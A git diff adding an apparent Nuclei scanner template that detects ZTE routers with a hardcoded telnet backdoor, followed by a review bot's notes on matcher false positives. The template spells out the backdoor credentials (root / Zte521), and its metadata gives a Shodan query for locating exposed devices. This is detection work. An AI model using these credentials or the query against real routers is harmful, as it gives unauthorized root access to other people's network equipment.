diff --git a/network/backdoor/backdoored-zte.yaml b/network/backdoor/backdoored-zte.yaml
new file mode 100644
index 0000000000..1c3c9c8e05
--- /dev/null
+++ b/network/backdoor/backdoored-zte.yaml
@@ -0,0 +1,34 @@
+id: backdoored-zte
+
+info:
+  name: Backdoored ZTE Routers
+  author: its0x08
+  severity: high
+  description: |
+    Multiple ZTE routers have a telnet hardcoded backdoor account that spawns root shell.
+  reference:
+    - https://www.exploit-db.com/ghdb/7179
+  metadata:
+    verified: true
+    shodan-query: http.html:"ZTE Corporation"
+  tags: network,zte,telnet,backdoor,router
+
+network:
+  - host:
+      - "{{Hostname}}"
+      - "{{Host}}:23"
+
+    inputs:
+      - data: "root\r\n"
+      - data: "Zte521\r\n\r\n"
+        read: 1024
+
+    matchers:
+      - type: word
+        words:
+          - "BusyBox"
+
+    extractors:
+      - type: regex
+        regex:
+          - '[A-Z]{1,}[0-9]{3,4}'
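Review bot: The single-word matcher on `BusyBox` does not establish that the hardcoded credential was accepted, because BusyBox-based telnet services can print that string in a pre-authentication banner or rejection path, so a patched device may still be reported as backdoored. Requiring a post-login shell indicator together with it, e.g. `words:` listing both `"BusyBox"` and `"#"` under `condition: and`, would cut that false-positive risk; it is also worth confirming against a captured response that the data the matcher sees is what is read after the second input, since `read: 1024` is set only there. The extractor regex `'[A-Z]{1,}[0-9]{3,4}'` is unanchored and presumably meant to pull a model designation from the banner; a short comment above it naming what it is expected to extract, such as `# extracts the device model string (e.g. uppercase letters followed by 3-4 digits) from the banner`, would help maintainers judge whether it still fits. The reference list carries only a GHDB entry; if a vendor advisory or CVE exists for this account, adding it would give defenders a remediation pointer.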